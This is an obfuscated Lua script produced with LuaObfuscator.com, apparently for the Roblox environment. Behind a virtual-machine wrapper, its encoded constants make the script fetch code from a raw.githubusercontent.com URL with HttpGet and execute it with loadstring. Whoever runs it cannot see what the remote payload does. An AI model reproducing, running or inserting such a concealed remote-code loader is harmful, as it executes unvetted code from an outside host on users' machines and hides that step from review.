--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v114=v5(v90,v19);v19=nil;return v114;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -0)) then v92=(v31/(2^(v32-(1 -0))))%((4 -(2 + 0))^(((v33-(620 -((790 -235) + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v92-(v92%1) ;end end else local v93=927 -(214 + (1778 -(68 + 997))) ;local v94;while true do if (v93==(0 + 0)) then v94=2^(v32-(1 + 0)) ;return (((v31%(v94 + v94))>=v94) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;return (v40 * (16778173 -(892 + (120 -55)))) + (v39 * (156337 -90801)) + (v38 * 256) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==((369 -(10 + 8)) -(87 + 263))) then v44=181 -(67 + (434 -321)) ;v45=(v20(v43,1 + 0 ,20) * (2^(78 -46))) + v42 ;v41=(444 -(416 + 26)) + (0 -0) ;end if ((7 -5)==v41) then v46=v20(v43,973 -(345 + 457 + (265 -115)) ,83 -52 );v47=((v20(v43,32)==(1 -(438 -(145 + 293)))) and  -(1 + 0)) or (998 -(915 + 82)) ;v41=8 -5 ;end if (v41==(0 + 0)) then v42=v23();v43=v23();v41=1;end if (v41==(3 -0)) then if (v46==(1187 -(1069 + 118))) then if (v45==(0 -0)) then return v47 * 0 ;else v46=(431 -(44 + 386)) -(1486 -(998 + 488)) ;v44=0 + 0 + 0 + 0 ;end elseif (v46==(3636 -(2361 -(201 + 571)))) then return ((v45==0) and (v47 * ((1139 -(116 + 1022))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/(((24 -18) -4)^52))) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v66=3 -2 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v113=(function() return 0;end)();while true do if (0~=v113) then else if (v104~=(2 -1)) then else while true do if (v95~=(1206 -(696 + 510))) then else v96=(function() return v97();end)();if (v98(v96, #"{", #"\\")==(0 -0)) then local v160=(function() return 1262 -(1091 + 171) ;end)();local v161=(function() return;end)();local v162=(function() return;end)();local v163=(function() return;end)();while true do if (v160==(0 + 0)) then local v170=(function() return 1990 -(582 + 1408) ;end)();local v171=(function() return;end)();while true do if (v170~=(0 -0)) then else v171=(function() return 0;end)();while true do if (v171==(3 -2)) then v160=(function() return 1;end)();break;end if (v171==(0 -0)) then local v179=(function() return 0;end)();while true do if (v179==0) then v161=(function() return v98(v96,7 -5 , #"asd");end)();v162=(function() return v98(v96, #"0836",380 -(123 + 251) );end)();v179=(function() return 4 -3 ;end)();end if (v179~=(699 -(208 + 490))) then else v171=(function() return 1 + 0 ;end)();break;end end end end break;end end end if ((244 -(187 + 54))~=v160) then else if (v98(v162, #"asd", #"asd")== #">") then v163[ #"0313"]=(function() return v101[v163[ #".dev"]];end)();end v102[v103]=(function() return v163;end)();break;end if (v160~=1) then else local v173=(function() return 0;end)();while true do if (v173~=(780 -(162 + 618))) then else v163=(function() return {v99(),v99(),nil,nil};end)();if (v161==(0 + 0)) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==(836 -(660 + 176))) then v178=(function() return 0 + 0 ;end)();while true do if (v178~=(202 -(14 + 188))) then else v163[ #"91("]=(function() return v99();end)();v163[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v161== #"[") then v163[ #"91("]=(function() return v100();end)();elseif (v161==(2 + 0)) then v163[ #"xxx"]=(function() return v100() -((3 -1)^(26 -10)) ;end)();elseif (v161== #"-19") then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184==(675 -(534 + 141))) then v185=(function() return 0;end)();while true do if ((0 + 0)~=v185) then else v163[ #"xnx"]=(function() return v100() -((2 + 0)^16) ;end)();v163[ #"asd1"]=(function() return v99();end)();break;end end break;end end end v173=(function() return 1 + 0 ;end)();end if (v173==(1 -0)) then v160=(function() return 2 -0 ;end)();break;end end end if (v160==(5 -3)) then if (v98(v162, #"!", #",")== #"~") then v163[1 + 1 ]=(function() return v101[v163[2 + 0 ]];end)();end if (v98(v162,2 -0 ,2 + 0 )== #"}") then v163[ #"asd"]=(function() return v101[v163[ #"gha"]];end)();end v160=(function() return 1387 -(746 + 638) ;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end if (v104==0) then local v121=(function() return 0;end)();while true do if ((0 + 0)~=v121) then else v95=(function() return 396 -(115 + 281) ;end)();v96=(function() return nil;end)();v121=(function() return 342 -(218 + 123) ;end)();end if (v121==(1582 -(1535 + 46))) then v104=(function() return 1;end)();break;end end end break;end end end end;end)();local v52=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();while true do if (v108==(0 + 0)) then v109=(function() return 0;end)();while true do if (v109==(0 -0)) then local v122=(function() return 0;end)();while true do if (v122==0) then v105[v106-#"[" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"<",v57 do local v69=(function() return 0 -0 ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(3 -2)) then v72=(function() return nil;end)();while true do if (v70~=(1 -0)) then else if (v71== #">") then v72=(function() return v21()~=(867 -(550 + 317)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"-19") then else v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end if (v70==(1467 -(899 + 568))) then local v120=(function() return 0;end)();while true do if (v120~=1) then else v70=(function() return 1;end)();break;end if (v120~=(0 + 0)) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v120=(function() return 1 -0 ;end)();end end end end break;end if (v69==(0 -0)) then v70=(function() return 603 -(268 + 335) ;end)();v71=(function() return nil;end)();v69=(function() return 2 -1 ;end)();end end end v56[ #"19("]=(function() return v21();end)();for v73= #"{",v23() do FlatIdent_25011,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_25011,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"}",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[573 -(426 + 146) ];local v64=v60[1 + 1 + 0 ];local v65=v60[(2649 -1190) -(282 + 1174) ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1;local v80= -(3 -2);local v81={};local v82={...};local v83=v12("#",...) -(2 -1) ;local v84={};local v85={};for v110=0,v83 do if ((3874==3874) and (v110>=v77)) then v81[v110-v77 ]=v82[v110 + ((3 -1) -1) ];else v85[v110]=v82[v110 + (321 -((291 -(64 + 174)) + 267)) ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1025 -(706 + 318) ];if ((v88<=(1258 -(721 + 530))) or (1938>4935)) then if ((v88<=3) or (4255<3423)) then if (v88<=1) then if (v88==(1271 -(945 + 326))) then v85[v87[984 -(18 + 964) ]]=v62[v87[11 -8 ]];else local v125=v87[4 -2 ];local v126,v127=v78(v85[v125](v13(v85,v125 + 1 + 0 + 0 ,v87[703 -(271 + (634 -205)) ])));v80=(v127 + v125) -(1 + 0) ;local v128=1500 -(1408 + 92) ;for v157=v125,v80 do v128=v128 + (1087 -(461 + 625)) ;v85[v157]=v126[v128];end end elseif (v88>(338 -(144 + 192))) then v85[v87[1 + 1 ]]();else v85[v87[1290 -(993 + (511 -(42 + 174))) ]]={};end elseif (v88<=(10 -5)) then if (v88==(2 + 0 + 2)) then do return;end else v85[v87[2 + 0 + 0 ]]();end elseif ((1454<=2491) and (v88==(3 + 3))) then v85[v87[1 + 0 + (1505 -(363 + 1141)) ]]=v62[v87[1174 -(418 + 753) ]];else local v132=0 + 0 ;local v133;while true do if ((v132==(0 + 0)) or (4157<=2803)) then v133=v87[1553 -(1126 + 425) ];v85[v133]=v85[v133](v13(v85,v133 + 1 + 0 ,v80));break;end end end elseif (v88<=(43 -32)) then if ((4853>=2982) and (v88<=(3 + 6))) then if ((4134>3357) and (v88==(537 -(406 + (1703 -(1183 + 397)))))) then local v134=1769 -(1749 + 20) ;local v135;local v136;local v137;local v138;while true do if (v134==(1 + 0)) then v80=(v137 + v135) -((4027 -2704) -(1249 + 73)) ;v138=0 + 0 ;v134=(841 + 306) -(466 + 508 + 171) ;end if (((0 -0)==v134) or (3417<2534)) then v135=v87[5 -3 ];v136,v137=v78(v85[v135](v13(v85,v135 + (1901 -(106 + 1794)) ,v87[1 + 2 ])));v134=1 + 0 ;end if ((v134==(5 -(1978 -(1913 + 62)))) or (2722<=164)) then for v167=v135,v80 do v138=v138 + ((2 + 0) -1) ;v85[v167]=v136[v138];end break;end end else local v139=v87[2 + 0 ];local v140=v85[v87[(5 -3) + 1 ]];v85[v139 + 1 ]=v140;v85[v139]=v140[v87[3 + (1934 -(565 + 1368)) ]];end elseif (v88==(124 -(4 + 110))) then do return;end else v85[v87[586 -(57 + 527) ]]={};end elseif (v88<=(1440 -(41 + 1386))) then if ((v88==12) or (2408<2109)) then local v145=v87[105 -(17 + 86) ];v85[v145]=v85[v145](v13(v85,v145 + 1 + 0 ,v80));else v85[v87[3 -1 ]]=v87[8 -5 ];end elseif ((v88>(180 -(122 + 44))) or (33==1455)) then local v149=v87[2 -(0 -0) ];local v150=v85[v87[9 -6 ]];v85[v149 + 1 + 0 ]=v150;v85[v149]=v150[v87[9 -5 ]];else v85[v87[1 + 1 ]]=v87[734 -(476 + 255) ];end v79=v79 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0047616D6503073Q00482Q7470476574034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F63726F636F3334332F666467686664672F726566732F68656164732F6D61696E2F67666F686A6766736A686F00094Q000B7Q00122Q000100013Q00122Q000200023Q00200900020002000300120D000400044Q0008000200044Q000700013Q00022Q00030001000100012Q00043Q00017Q00",v9(),...);
